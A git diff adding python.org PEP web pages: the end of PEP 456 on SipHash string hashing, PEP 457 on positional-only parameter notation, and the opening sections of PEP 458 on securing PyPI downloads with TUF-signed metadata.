The _Py_HashSecret_t type of Python 2.6 to 3.3 has two members, each with either 32- or 64-bit length. SipHash requires two 64-bit unsigned integers as keys. The typedef will be changed to a union with a guaranteed size of 24 bytes on all architectures. The union provides a 128-bit random key for SipHash24 and FNV, as well as an additional 64-bit value for the optional small string optimization and the pyexpat seed. The additional 64-bit seed ensures that neither pyexpat nor small string optimization can reveal bits of the SipHash24 seed.

+

memory layout on 64 bit systems:

+
cccccccc cccccccc cccccccc  uc -- unsigned char[24]
+pppppppp ssssssss ........  fnv -- two Py_hash_t
+k0k0k0k0 k1k1k1k1 ........  siphash -- two PY_UINT64_T
+........ ........ ssssssss  djbx33a -- 16 bytes padding + one Py_hash_t
+........ ........ eeeeeeee  pyexpat XML hash salt
+
+
+

memory layout on 32 bit systems:

+
cccccccc cccccccc cccccccc  uc -- unsigned char[24]
+ppppssss ........ ........  fnv -- two Py_hash_t
+k0k0k0k0 k1k1k1k1 ........  siphash -- two PY_UINT64_T (if available)
+........ ........ ssss....  djbx33a -- 16 bytes padding + one Py_hash_t
+........ ........ eeee....  pyexpat XML hash salt
+
+
+

new type definition:

+
typedef union {
+    /* ensure 24 bytes */
+    unsigned char uc[24];
+    /* two Py_hash_t for FNV */
+    struct {
+        Py_hash_t prefix;
+        Py_hash_t suffix;
+    } fnv;
+#ifdef PY_UINT64_T
+    /* two uint64 for SipHash24 */
+    struct {
+        PY_UINT64_T k0;
+        PY_UINT64_T k1;
+    } siphash;
+#endif
+    /* a different (!) Py_hash_t for small string optimization */
+    struct {
+        unsigned char padding[16];
+        Py_hash_t suffix;
+    } djbx33a;
+    struct {
+        unsigned char padding[16];
+        Py_hash_t hashsalt;
+    } expat;
+} _Py_HashSecret_t;
+PyAPI_DATA(_Py_HashSecret_t) _Py_HashSecret;
+
+
+

_Py_HashSecret_t is initialized in Python/random.c:_PyRandom_Init() +exactly once at startup.

+
+
+

hash function definition

+

Implementation:

+
typedef struct {
+    /* function pointer to hash function, e.g. fnv or siphash24 */
+    Py_hash_t (*const hash)(const void *, Py_ssize_t);
+    const char *name;       /* name of the hash algorithm and variant */
+    const int hash_bits;    /* internal size of hash value */
+    const int seed_bits;    /* size of seed input */
+} PyHash_FuncDef;
+
+PyAPI_FUNC(PyHash_FuncDef*) PyHash_GetFuncDef(void);
+
+
+
+
+

autoconf

+

A new test is added to the configure script. The test sets HAVE_ALIGNED_REQUIRED when it detects a platform that requires aligned memory access for integers. Most current platforms such as X86, X86_64 and modern ARM don’t need aligned data.

+

A new option --with-hash-algorithm enables the user to select a hash +algorithm in the configure step.

+
+
+

hash function selection

+

The value of the macro Py_HASH_ALGORITHM defines which hash algorithm is used internally. It may be set to any of the three values Py_HASH_SIPHASH24, Py_HASH_FNV or Py_HASH_EXTERNAL. If Py_HASH_ALGORITHM is not defined at all, then the best available algorithm is selected. On platforms which don’t require aligned memory access (HAVE_ALIGNED_REQUIRED not defined) and which provide an unsigned 64-bit integer type PY_UINT64_T, SipHash24 is used. On strict C89 platforms without a 64-bit data type, or on architectures such as SPARC, FNV is selected as the fallback. A hash algorithm can be selected with an autoconf option, for example ./configure --with-hash-algorithm=fnv.

+

The value Py_HASH_EXTERNAL allows 3rd parties to provide their own +implementation at compile time.

+

Implementation:

+
#if Py_HASH_ALGORITHM == Py_HASH_EXTERNAL
+extern PyHash_FuncDef PyHash_Func;
+#elif Py_HASH_ALGORITHM == Py_HASH_SIPHASH24
+static PyHash_FuncDef PyHash_Func = {siphash24, "siphash24", 64, 128};
+#elif Py_HASH_ALGORITHM == Py_HASH_FNV
+static PyHash_FuncDef PyHash_Func = {fnv, "fnv", 8 * sizeof(Py_hash_t),
+                                     16 * sizeof(Py_hash_t)};
+#endif
+
+
+
+
+
+

Python API addition

+
+

sys module

+

The sys module already has a hash_info struct sequence. More fields are added +to the object to reflect the active hash algorithm and its properties.

+
sys.hash_info(width=64,
+              modulus=2305843009213693951,
+              inf=314159,
+              nan=0,
+              imag=1000003,
+              # new fields:
+              algorithm='siphash24',
+              hash_bits=64,
+              seed_bits=128,
+              cutoff=0)
+
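Applications that care about the configured algorithm can then inspect it at runtime, for example:

import sys

if sys.hash_info.algorithm == 'siphash24':
    print("SipHash24 with a", sys.hash_info.seed_bits, "bit seed")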
+
+
+
+
+

Necessary modifications to C code

+
+

_Py_HashBytes() (Objects/object.c)

+

_Py_HashBytes is an internal helper function that provides the hashing +code for bytes, memoryview and datetime classes. It currently implements FNV +for unsigned char *.

+

The function is moved to Python/pyhash.c and modified to use the hash function +through PyHash_Func.hash(). The function signature is altered to take +a const void * as first argument. _Py_HashBytes also takes care of +special cases: it maps zero length input to 0 and return value of -1 +to -2.

+
+
+

bytes_hash() (Objects/bytesobject.c)

+

bytes_hash uses _Py_HashBytes to provide the tp_hash slot function +for bytes objects. The function will continue to use _Py_HashBytes +but without a type cast.

+
+
+

memory_hash() (Objects/memoryobject.c)

+

memory_hash provides the tp_hash slot function for read-only memory +views if the original object is hashable, too. It’s the only function that +has to support hashing of unaligned memory segments in the future. The +function will continue to use _Py_HashBytes but without a type cast.

+
+
+

unicode_hash() (Objects/unicodeobject.c)

+

unicode_hash provides the tp_hash slot function for unicode. Right now it +implements the FNV algorithm three times for unsigned char*, Py_UCS2 +and Py_UCS4. A reimplementation of the function must take care to use the +correct length. Since the macro PyUnicode_GET_LENGTH returns the length +of the unicode string and not its size in octets, the length must be +multiplied with the size of the internal unicode kind:

+
if (PyUnicode_READY(u) == -1)
+    return -1;
+x = _Py_HashBytes(PyUnicode_DATA(u),
+                  PyUnicode_GET_LENGTH(u) * PyUnicode_KIND(u));
+
+
+
+
+

generic_hash() (Modules/_datetimemodule.c)

+

generic_hash acts as a wrapper around _Py_HashBytes for the tp_hash slots of the date, time and datetime types. timedelta objects are hashed by their state (days, seconds, microseconds) and tzinfo objects are not hashable. The data members of the date, time and datetime types’ structs are not void* aligned. This can easily be fixed by memcpy()ing four to ten bytes to an aligned buffer.

+
+
+
+

Performance

+

In general the PEP 456 code with SipHash24 is about as fast as the old code with FNV. SipHash24 seems to make better use of modern compilers, CPUs and large L1 caches. Several benchmarks show a small speed improvement on 64-bit CPUs such as the Intel Core i5 and Intel Core i7 processors. 32-bit builds and benchmarks on older CPUs such as an AMD Athlon X2 are slightly slower with SipHash24. The performance increase or decrease is so small that it should not affect any application code.

+

The benchmarks were conducted on CPython default branch revision b08868fd5994 +and the PEP repository [pep-456-repos]. All upstream changes were merged +into the pep-456 branch. The “performance” CPU governor was configured and +almost all programs were stopped so the benchmarks were able to utilize +TurboBoost and the CPU caches as much as possible. The raw benchmark results +of multiple machines and platforms are made available at [benchmarks].

+
+

Hash value distribution

+

A good distribution of hash values is important for dict and set performance. +Both SipHash24 and FNV take the length of the input into account, so that +strings made up entirely of NULL bytes don’t have the same hash value. The +last bytes of the input tend to affect the least significant bits of the hash +value, too. That attribute reduces the amount of hash collisions for strings +with a common prefix.

+
+
+

Typical length

+

Serhiy Storchaka has shown in [issue16427] that a modified FNV +implementation with 64 bits per cycle is able to process long strings several +times faster than the current FNV implementation.

+

However, according to statistics [issue19183] a typical Python program as +well as the Python test suite have a hash ratio of about 50% small strings +between 1 and 6 bytes. Only 5% of the strings are larger than 16 bytes.

+
+
+

Grand Unified Python Benchmark Suite

+

Initial tests with an experimental implementation and the Grand Unified Python +Benchmark Suite have shown minimal deviations. The summarized total runtime +of the benchmark is within 1% of the runtime of an unmodified Python 3.4 +binary. The tests were run on an Intel i7-2860QM machine with a 64-bit Linux +installation. The interpreter was compiled with GCC 4.7 for 64- and 32-bit.

+

More benchmarks will be conducted.

+
+
+
+

Backwards Compatibility

+

The modifications don’t alter any existing API.

+

The output of hash() for strings and bytes is going to be different. The hash values for ASCII Unicode and ASCII bytes will stay equal.

+
+
+

Alternative counter measures against hash collision DoS

+

Three alternative countermeasures against hash collisions were discussed in +the past, but are not subject of this PEP.

+
    +
  1. Marc-Andre Lemburg has suggested that dicts shall count hash collisions. In +case an insert operation causes too many collisions an exception shall be +raised.
  2. +
3. Some applications (e.g. PHP) limit the number of keys for GET and POST HTTP requests. The approach effectively mitigates the impact of a hash collision attack. (XXX citation needed)
  4. +
5. Hash maps have a worst case of O(n) for insertion and lookup of keys. This results in a quadratic runtime during a hash collision attack. The introduction of a new, additional data structure with O(log n) worst-case behavior would eliminate the root cause. Data structures like red-black trees or prefix trees (tries [trie]) would have other benefits, too. Prefix trees with string keys can reduce memory usage, as common prefixes are stored within the tree structure.
  6. +
+
+
+

Discussion

+
+

Pluggable

+

The first draft of this PEP made the hash algorithm pluggable at runtime. It +supported multiple hash algorithms in one binary to give the user the +possibility to select a hash algorithm at startup. The approach was considered +an unnecessary complication by several core committers [pluggable]. Subsequent +versions of the PEP aim for compile time configuration.

+
+
+

Non-aligned memory access

+

The implementation of SipHash24 was criticized because it ignores the issue of non-aligned memory access and therefore doesn’t work on architectures that require alignment of integer types. The PEP deliberately neglects this special case and doesn’t support SipHash24 on such platforms. It’s simply not considered worth the trouble until proven otherwise. All major platforms like X86, X86_64 and ARMv6+ can handle unaligned memory with minimal or even no speed impact. [alignmentmyth]

+

Almost every block is properly aligned anyway. At present bytes’ and str’s +data are always aligned. Only memoryviews can point to unaligned blocks +under rare circumstances. The PEP implementation is optimized and simplified +for the common case.

+
+
+

ASCII str / bytes hash collision

+

Since the implementation of PEP 393, bytes and ASCII text have the same +memory layout. Because of this the new hashing API will keep the invariant:

+
hash("ascii string") == hash(b"ascii string")
+
+
+

for ASCII strings and ASCII bytes. Equal hash values result in a hash collision and therefore cause a minor speed penalty for dicts and sets with mixed keys. The cause of the collision could be removed by e.g. subtracting 2 from the hash value of bytes (-2 because hash(b"") == 0 and -1 is reserved). The PEP doesn’t change the hash value.

+
+
+
+

References

+
    +
  • Issue 19183 [issue19183] contains a reference implementation.
  • +
+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0456.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0457/index.html b/pep-0457/index.html
new file mode 100644
index 00000000000..a16c5dca36c
--- /dev/null
+++ b/pep-0457/index.html
@@ -0,0 +1,374 @@
PEP 457 – Notation For Positional-Only Parameters | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 457 – Notation For Positional-Only Parameters

+
+
Author:
+
Larry Hastings <larry at hastings.org>
+
Discussions-To:
+
Python-Dev list
+
Status:
+
Final
+
Type:
+
Informational
+
Created:
+
08-Oct-2013
+
+
+
+
Table of Contents +
+
+

Overview

+

This PEP proposes a notation for positional-only parameters in Python. +Positional-only parameters are parameters without an externally-usable +name; when a function accepting positional-only parameters is called, +positional arguments are mapped to these parameters based solely on +their position.

+

This PEP is an Informational PEP describing the notation for use when +describing APIs that use positional-only parameters (e.g. in Argument +Clinic, or in the string representation of inspect.Signature +objects). A separate PEP, PEP 570, proposes elevation of this notation +to full Python syntax.

+
+
+

Rationale

+

Python has always supported positional-only parameters. +Early versions of Python lacked the concept of specifying +parameters by name, so naturally all parameters were +positional-only. This changed around Python 1.0, when +all parameters suddenly became positional-or-keyword. +But, even in current versions of Python, many CPython +“builtin” functions still only accept positional-only +arguments.

+

Functions implemented in modern Python can accept +an arbitrary number of positional-only arguments, via the +variadic *args parameter. However, there is no Python +syntax to specify accepting a specific number of +positional-only parameters. Put another way, there are +many builtin functions whose signatures are simply not +expressible with Python syntax.

+

This PEP proposes a notation for such signatures that could form the +basis of a backwards-compatible syntax that should permit implementing +any builtin in pure Python code (see PEP 570 for that proposal).

+
+

Positional-Only Parameter Semantics In Current Python

+

There are many, many examples of builtins that only accept positional-only parameters. The resulting semantics are easily experienced by the Python programmer: just try calling one, specifying its arguments by name:

+
>>> pow(x=5, y=3)
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+TypeError: pow() takes no keyword arguments
+
+
+

In addition, there are some functions with particularly +interesting semantics:

+
    +
  • range(), which accepts an optional parameter +to the left of its required parameter. [2]
  • +
  • dict(), whose mapping/iterator parameter is optional and semantically must be positional-only. Any externally visible name for this parameter would occlude that name going into the **kwargs keyword variadic parameter dict! [1]
  • +
+

Obviously one can simulate any of these in pure Python code +by accepting (*args, **kwargs) and parsing the arguments +by hand. But this results in a disconnect between the +Python function’s signature and what it actually accepts, +not to mention the work of implementing said argument parsing.
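For instance, a pure-Python stand-in for range() (here a hypothetical my_range, for illustration) must dispatch on len(args) by hand:

def my_range(*args):
    # Hand-rolled parsing of range(stop) / range(start, stop[, step]).
    if len(args) == 1:
        start, stop, step = 0, args[0], 1
    elif len(args) == 2:
        start, stop, step = args[0], args[1], 1
    elif len(args) == 3:
        start, stop, step = args
    else:
        raise TypeError(f"my_range expected 1 to 3 arguments, got {len(args)}")
    return range(start, stop, step)

inspect.signature(my_range) reports only (*args), so the real calling convention stays invisible to documentation tools.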

+
+
+
+

Motivation

+

This PEP does not propose we implement positional-only +parameters in Python. The goal of this PEP is simply +to define the syntax, so that:

+
    +
  • Documentation can clearly, unambiguously, and +consistently express exactly how the arguments +for a function will be interpreted.
  • +
  • The syntax is reserved for future use, in case +the community decides someday to add positional-only +parameters to the language.
  • +
  • Argument Clinic can use a variant of the syntax +as part of its input when defining +the arguments for built-in functions.
  • +
+
+
+

The Current State Of Documentation For Positional-Only Parameters

+

The documentation for positional-only parameters is incomplete +and inconsistent:

+
    +
  • Some functions denote optional groups of positional-only arguments +by enclosing them in nested square brackets. [3]
  • +
  • Some functions denote optional groups of positional-only arguments +by presenting multiple prototypes with varying numbers of +arguments. [4]
  • +
  • Some functions use both of the above approaches. [2] [5]
  • +
+

One more important idea to consider: currently in the documentation +there’s no way to tell whether a function takes positional-only +parameters. open() accepts keyword arguments, ord() does +not, but there is no way of telling just by reading the +documentation that this is true.

+
+
+

Syntax And Semantics

+

From the “ten-thousand foot view”, and ignoring *args and **kwargs +for now, the grammar for a function definition currently looks like this:

+
def name(positional_or_keyword_parameters, *, keyword_only_parameters):
+
+
+

Building on that perspective, the new syntax for functions would look +like this:

+
def name(positional_only_parameters, /, positional_or_keyword_parameters,
+         *, keyword_only_parameters):
+
+
+

All parameters before the / are positional-only. If / is +not specified in a function signature, that function does not +accept any positional-only parameters.

+

Positional-only parameters can have a default value, and if they +do they are optional. Positional-only parameters that don’t have +a default value are “required” positional-only parameters.
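PEP 570 later turned this notation into executable syntax (Python 3.8+), which makes both rules easy to demonstrate; a small illustrative function:

def clamp(value, lo=0, hi=1, /):
    # All three parameters are positional-only; lo and hi have
    # defaults and are therefore optional, value is required.
    return max(lo, min(value, hi))

clamp(5, 0, 10)   # returns 5
clamp(5)          # returns 1; lo and hi take their defaults
clamp(value=5)    # TypeError: positional-only argument passed as a keyword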

+

More semantics of positional-only parameters:

+
    +
  • Although positional-only parameters technically have names, these names are internal-only; positional-only parameters are never externally addressable by name. (Similarly to *args and **kwargs.)
  • +
  • If there are parameters after the /, then you must specify a comma after the /, just as there is a comma after the * denoting the shift to keyword-only parameters.
  • +
  • This syntax has no effect on *args or **kwargs.
  • +
+
+
+

Additional Limitations

+

Argument Clinic uses a form of this syntax for specifying +builtins. It imposes further limitations that are +theoretically unnecessary but make the implementation +easier. Specifically:

+
    +
  • A function that has positional-only parameters currently +cannot have any other kind of parameter. (This will +probably be relaxed slightly in the near future.)
  • +
  • Argument Clinic supports an additional syntax called +“optional groups”. An “optional group” is a sequential +set of positional-only parameters that must be specified +or not-specified as a group. If, for example, you define +a function in Argument Clinic that takes four parameters, +and all of them are positional-only and in one optional +group, then when calling the function you must specify +either zero arguments or four arguments. This is necessary +to cover more of Python’s legacy library, but is outside +the scope of this PEP, and is not recommended for actual +inclusion in the Python language.
  • +
+
+
+

Notes For A Future Implementor

+

If we decide to implement positional-only parameters in a future +version of Python, we’d have to do some additional work to preserve +their semantics. The problem: how do we inform a parameter that +no value was passed in for it when the function was called?

+

The obvious solution: add a new singleton constant to Python +that is passed in when a parameter is not mapped to an argument. +I propose that the value be called undefined, +and be a singleton of a special class called Undefined. +If a positional-only parameter did not receive an argument +when called, its value would be set to undefined.
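A minimal sketch of that proposal (the names Undefined and undefined come from the paragraph above; the implementation details are illustrative):

class Undefined:
    _instance = None

    def __new__(cls):
        # Keep the class a singleton, like None's NoneType.
        if cls._instance is None:
            cls._instance = super().__new__(cls)
        return cls._instance

    def __repr__(self):
        return "undefined"

undefined = Undefined()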

+

But this raises a further problem. How can we tell the difference between “this positional-only parameter did not receive an argument” and “the caller passed in undefined for this parameter”?

+

It’d be nice to make it illegal to pass undefined in as an argument to a function; to, say, raise an exception. But that would slow Python down, and the “consenting adults” rule appears applicable here. So passing in undefined should probably be strongly discouraged but not outright prevented.

+

However, it should be allowed (and encouraged) for user +functions to specify undefined as a default value for +parameters.

+
+
+

Unresolved Questions

+

There are three types of parameters in Python:

+
    +
  1. positional-only parameters,
  2. positional-or-keyword parameters, and
  3. keyword-only parameters.
+

Python allows functions to have both 2 and 3. And some +builtins (e.g. range) have both 1 and 3. Does it make +sense to have functions that have both 1 and 2? Or +all of the above?

+
+
+

Thanks

+

Credit for the use of ‘/’ as the separator between positional-only and positional-or-keyword +parameters goes to Guido van Rossum, in a proposal from 2012. [6]

+

Credit for making left option groups higher precedence goes to +Alyssa Coghlan. (Conversation in person at PyCon US 2013.)

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0457.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0458/index.html b/pep-0458/index.html
new file mode 100644
index 00000000000..b0005f07a8a
--- /dev/null
+++ b/pep-0458/index.html
@@ -0,0 +1,1491 @@
PEP 458 – Secure PyPI downloads with signed repository metadata | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 458 – Secure PyPI downloads with signed repository metadata

+
+
Author:
+
Trishank Karthik Kuppusamy <karthik at trishank.com>, +Vladimir Diaz <vladimir.diaz at nyu.edu>, +Marina Moore <mm9693 at nyu.edu>, +Lukas Puehringer <lukas.puehringer at nyu.edu>, +Joshua Lock <jlock at vmware.com>, +Lois Anne DeLong <lad278 at nyu.edu>, +Justin Cappos <jcappos at nyu.edu>
+
Sponsor:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
BDFL-Delegate:
+
Donald Stufft <donald at stufft.io>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Accepted
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
27-Sep-2013
+
Post-History:
+
06-Jan-2019, 13-Nov-2019
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP describes changes to the PyPI infrastructure that are needed to ensure +that users get valid packages from PyPI. These changes should have minimal +impact on other parts of the ecosystem. The PEP focuses on communication between +PyPI and users, and so does not require any action by package developers. +Developers will upload packages using the current process, and PyPI will +automatically generate signed repository metadata for these packages.

+

In order for the security mechanism to be effective, additional work will need to be done by PyPI consumers (like pip) to verify the signatures and metadata provided by PyPI. This verification can be transparent to users (unless it fails) and provides an automatic security mechanism. There is documentation for how to consume TUF metadata in the TUF repository. However, changes to PyPI consumers are not a prerequisite for publishing the metadata from PyPI, and can be done according to the timelines and priorities of individual projects.

+
+
+

Proposed TUF Integration

+

This PEP proposes how The Update Framework [2] (TUF) should be integrated with the +Python Package Index (PyPI [1]). TUF was designed to be a flexible +security add-on to a software updater or package manager. A full implementation +of the framework +integrates best security practices, such as separating role responsibilities, +adopting the many-man rule for signing packages, keeping signing keys offline, +and revocation of expired or compromised signing keys. As a result, attackers +would need to steal multiple signing keys, which are stored independently, +in order to compromise the role responsible for specifying a repository’s available +files. Or, alternatively, a role +responsible for indicating the latest snapshot of the repository may also have to be +compromised.

+

The initial integration proposed in this PEP will allow modern package managers, +such as pip [3], to be more secure against attacks on PyPI mirrors and PyPI’s +own content distribution network, and to better protect users from such attacks. +Specifically, this PEP describes how PyPI processes +should be adapted to generate and incorporate TUF metadata (i.e., the minimum +security model). This minimum security model supports verification of PyPI +distributions that are signed with keys stored on PyPI. Distributions that are +uploaded by developers are signed by PyPI, requiring no action from developers +(other than uploading the distribution), and are immediately available for +download. The minimum security model also minimizes PyPI administrative +responsibilities by automating much of the signing process.

+

There is no discussion in this PEP of support for project distributions that +are signed by developers (maximum security model). This possible future extension +is covered in detail in PEP 480. The maximum security model requires more PyPI +administrative work (though no added work for clients), and also proposes +an easy-to-use key management solution for developers/publishers, ideas on how +to interface with a potential future build farm on PyPI infrastructure, and the +feasibility of end-to-end signing.

+

While it does provide implementation recommendations, this PEP does not +prescribe exactly how package managers, such as pip, should be adapted +to install or update projects from PyPI with TUF metadata. Package managers +interested in adopting TUF on the client side may consult its library +documentation, which was created for this purpose.

+
+
+

Non-goals

+

This PEP does not eliminate any existing features from PyPI. In particular, it +does not replace existing support for OpenPGP signatures. Developers can continue +to upload detached OpenPGP signatures along with distributions. In the future, +PEP 480 may allow developers to directly sign TUF metadata using their OpenPGP keys.

+
+
+

PEP Status

+

Due to the amount of work required to implement this PEP, in early +2019 it was deferred until appropriate funding could be secured to +implement the PEP. The Python Software Foundation secured this funding +[22] and new PEP coauthors restarted PEP discussion.

+
+
+

Motivation

+

Attacks on software repositories are common, even in organizations with very +good security practices. The resulting repository compromise allows an +attacker to edit all files stored on the repository and sign these files using +any keys stored on the repository (online keys). In many signing schemes (like +TLS), this access allows the attacker to replace files on the repository and +make it look like these files are coming from PyPI. Without a way to revoke and +replace the trusted private key, it is very challenging to recover from a +repository compromise. In addition to the dangers of repository compromise, +software repositories are vulnerable to an attacker on the network (MITM) +intercepting and changing files. These and other attacks on software +repositories are detailed here.

+

This PEP, together with the follow-up proposal in PEP 480, aims to protect users +of PyPI from compromises of the integrity, consistency, and freshness properties +of PyPI packages, and enhances compromise resilience by mitigating key risk and +providing mechanisms to recover from a compromise of PyPI or its signing keys.

+

On January 5, 2013, the Python Software Foundation (PSF) announced [4] that a security breach had occurred on the python.org wikis for Python and Jython. As a result, all of the wiki data was destroyed. Fortunately, the PyPI infrastructure was not affected by this breach. However, the incident is a reminder that PyPI needed to take defensive steps to protect users as much as possible in the event of a compromise. Attacks on software repositories happen all the time [5]. The PSF must accept the possibility of security breaches and prepare PyPI accordingly because it is a valuable resource used by thousands, if not millions, of people.

+

Before the wiki attack, PyPI used MD5 hashes to tell package managers, such as +pip, whether or not a distribution file was corrupted in transit. However, the absence +of SSL made it hard for package managers to verify transport integrity to PyPI. +It was therefore easy to launch a man-in-the-middle attack between pip and +PyPI, and arbitrarily change the content of distributions. As a result, users could be tricked into +installing malicious distributions. After the wiki +attack, several steps were proposed (some of which were implemented) to deliver +a much higher level of security than was previously the case. These steps included +requiring SSL to +communicate with PyPI [6], restricting project names [7], and migrating from +MD5 to SHA-2 hashes [8].

+

Though necessary, these steps are insufficient to protect distributions because attacks are still +possible through other avenues. For example, a public mirror is trusted to +honestly mirror PyPI, but some mirrors may misbehave, whether by accident or through +malicious intervention. +Package managers such as pip are supposed to use signatures from PyPI to verify +distribution files downloaded from a public mirror, but none are known to actually +do so [10]. Therefore, it would be wise to add more security measures to +detect attacks from public mirrors or content delivery networks [11] (CDNs).

+

Even though official mirrors have been deprecated on PyPI, a +wide variety of other attack vectors on package managers remain [13]. These attacks +can crash client systems, cause obsolete distributions to be installed, or even +allow an attacker to execute arbitrary code. In September 2013, a post was +made to the Distutils mailing list showing that the latest version of pip (at +the time) was susceptible to such attacks, and how TUF could protect users +against them [14]. Specifically, testing was done to see how pip would +respond to these attacks with and without TUF. Attacks tested included replay +and freeze, arbitrary installation, slow retrieval, and endless data. The post +also included a demonstration of how pip would respond if PyPI were +compromised.

+

To provide compromise resilient protection of PyPI, this PEP proposes the use of +The Update Framework [2] (TUF). TUF provides protection from a variety of +attacks on software update systems, while also providing mechanisms to recover +from a repository compromise. TUF has been used in production by a number of +organizations, including use in Cloud Native Computing Foundation’s Notary +service, which provides the infrastructure for container image signing in Docker +Registry. The TUF specification has been the subject of three independent +security audits.

+

The scope of this PEP is protecting users from compromises of PyPI mirrors, +and PyPI’s own TLS termination and content distribution infrastructure. +Protection from compromises of PyPI itself is discussed in PEP 480.

+
+
+

Threat Model

+

The threat model assumes the following:

+
    +
  • Offline keys are safe and securely stored.
  • +
  • Attackers cannot compromise PyPI’s trusted keys stored online.
  • +
  • Attackers can respond to client requests.
  • +
+

An attacker is considered successful if it can cause a client to install (or +leave installed) something other than the most up-to-date version of a +software distribution file. If the attacker is preventing the installation +of updates, they do not want clients to realize there is anything wrong.

+

This threat model describes the minimum security model. The maximum security +model described in PEP 480 also assumes that attackers can compromise PyPI’s +online keys.

+
+
+

Definitions

+

The keywords “MUST”, “MUST NOT”, “REQUIRED”, “SHALL”, “SHALL NOT”, “SHOULD”, +“SHOULD NOT”, “RECOMMENDED”, “MAY”, and “OPTIONAL” in this document are to be +interpreted as described in RFC 2119.

+

This PEP focuses only on integrating TUF into PyPI. However, the reader is +encouraged to review TUF design principles [2] and SHOULD be +familiar with the TUF specification [16].

+

The following terms used in this PEP are defined in the Python Packaging +Glossary [17]: project, release, distribution.

+

Additional terms used in this PEP are defined as follows:

+
    +
  • Role: TUF specifies one root role and multiple other roles to which the +root role delegates responsibilities, directly or indirectly. The term +top-level role refers to the root role and any role specified directly by +the root role, i.e. timestamp, snapshot and targets roles. Each role +has a single metadata file that it is trusted to provide.
  • +
  • Distribution file: A versioned archive file that contains Python packages, +modules, and other resource files that are used to distribute a release. The +terms distribution file, distribution package [17], or simply +distribution or package may be used interchangeably in this PEP.
  • +
  • Simple index: The HTML page that contains internal links to distribution +files.
  • +
  • Target files: As a rule of thumb, target files are all files on PyPI whose +integrity should be guaranteed with TUF. Typically, this includes +distribution files and PyPI metadata, such as simple indices.
  • +
  • Metadata: Metadata are signed files that describe roles, other metadata, and +target files. If not specified otherwise metadata means TUF-specific +metadata.
  • +
  • Repository: A repository is a source for named metadata and target +files. Clients request metadata and target files stored on a repository.
  • +
  • Consistent snapshot: A set of TUF metadata and target files that capture the +complete state of all projects on PyPI as they existed at some fixed point in +time.
  • +
  • Developer: Either the owner or maintainer of a project who is allowed to +update the TUF metadata, as well as target files for a project.
  • +
  • Online key: A private cryptographic key that MUST be stored on the PyPI +server infrastructure. This is usually to allow automated signing with the +key. However, an attacker who compromises the PyPI infrastructure will be +able to read these keys.
  • +
  • Offline key: A private cryptographic key that MUST be stored independent of +the PyPI server infrastructure. This prevents automated signing with the +key. An attacker who compromises the PyPI infrastructure will not be able to +immediately read these keys.
  • +
  • Threshold signature scheme: A role can increase its resilience to key +compromises by specifying that at least t out of n keys are REQUIRED to sign +its metadata. A compromise of t-1 keys is insufficient to compromise the +role itself. Saying that a role requires (t, n) keys denotes the threshold +signature property.
  • +
+
+
+

Overview of TUF

+

At its highest level, TUF provides applications with a secure method for +knowing about and obtaining new versions of files. On the +surface, this all sounds simple. The basic steps for updating applications are:

+
    +
  • Knowing an update exists.
  • +
  • Downloading a correct copy of the latest version of the updated file.
  • +
+

The problem is that updating applications is only simple when there are no +malicious activities in the picture. If an attacker is trying to interfere with +these seemingly simple steps, there is plenty they can do.

+

Assume a software updater takes the approach of most systems (at least the ones +that try to be secure). It downloads both the file it wants and a cryptographic +signature of the file. The software updater already knows which key it trusts +to make the signature. It checks that the signature is correct and was made by +this trusted key. Unfortunately, the software updater is still at risk in many +ways, including the following scenarios:

+
    +
  • An attacker keeps giving the software updater the same update file, so it +never realizes there is an update.
  • +
  • An attacker gives the software updater an older, insecure version of a file +that it already has, so it downloads that one and blindly uses it thinking it +is newer.
  • +
  • An attacker gives the software updater a newer version of a file, but +not the newest one. The file is newer to the software updater, but it +may be insecure and exploitable by the attacker.
  • +
  • An attacker compromises the key used to sign these files and now the software +updater downloads a malicious file that is properly signed.
  • +
+

TUF is designed to address these attacks, and others, by adding signed metadata +(text files that describe the repository’s files) to the repository and +referencing the metadata files during the update procedure. Repository files +are verified against the information included in the metadata before they are +handed off to the software update system. The framework also provides +multi-signature trust, explicit and implicit revocation of cryptographic keys, +responsibility separation of the metadata, and minimized key risk. For a full +list and outline of the repository attacks and software updater weaknesses +addressed by TUF, see Appendix A.

+
+
+

Integrating PyPI with TUF

+

A software update system must complete two main tasks to integrate with TUF. +First, the repository on the server side MUST be modified to provide signed +TUF metadata. This PEP is concerned with the first part of the integration, +and the changes on PyPI required to support software updates with TUF.

+

Second, it must add the framework to the client side of the update system. For example, TUF MAY be integrated with the pip package manager. Thus, new versions of pip going forward SHOULD use TUF by default to download and verify distributions from PyPI before installing them. However, there may be unforeseen issues that might prevent users from installing or updating distributions, including pip itself, via TUF. Therefore, pip SHOULD provide an option, e.g. --unsafely-disable-package-verification, in order to work around such issues until they are resolved. Note, the proposed option name is purposefully long, because a user must be helped to understand that the action is unsafe and not generally recommended.

+

We assume that pip would use TUF to verify distributions downloaded only from PyPI. pip MAY support TAP 4 in order to use TUF to also verify distributions downloaded from elsewhere.

+
+

What Additional Repository Files are Required on PyPI?

+

In order for package managers like pip to download and verify distributions with +TUF, a few extra files MUST be added to PyPI. These extra repository files are +called TUF metadata, and they contain such information as which keys can be trusted, +the cryptographic hashes of files, signatures, metadata version numbers, and +the date after which the metadata should be considered expired.

+

When a package manager wants to check for updates, it asks TUF to do the work. +That is, a package manager never has to deal with this additional metadata or +understand what’s going on underneath. If TUF reports back that there are +updates available, a package manager can then ask TUF to download these files +from PyPI. TUF downloads them and checks them against the TUF metadata that it +also downloads from the repository. If the downloaded target files are +trustworthy, TUF then hands them over to the package manager.

+

The Document formats section of the TUF specification provides information +about each type of required metadata and its expected content. The next +section covers the different kinds of metadata RECOMMENDED for PyPI.

+

